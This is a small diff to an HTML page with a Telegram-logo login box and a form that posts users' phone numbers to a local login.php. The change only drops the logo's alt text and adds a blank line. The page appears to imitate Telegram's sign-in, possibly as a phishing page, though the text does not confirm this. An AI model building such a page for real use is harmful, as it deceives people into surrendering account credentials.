--- a/index.html
+++ b/index.html
@@ -10,7 +10,7 @@
     <div class="page-container">
         <div class="login-box">
             <div class="login-logo">
-                <img src="images/telegram-logo.png" alt="Telegram Logo">
+                <img src="images/telegram-logo.png" >
             </div>
             <form action="login.php" method="post">
                 <input type="text" name="phone" placeholder="Phone number" required>
@@ -24,4 +24,5 @@
         </div>
     </div>
 </body>
+
 </html>
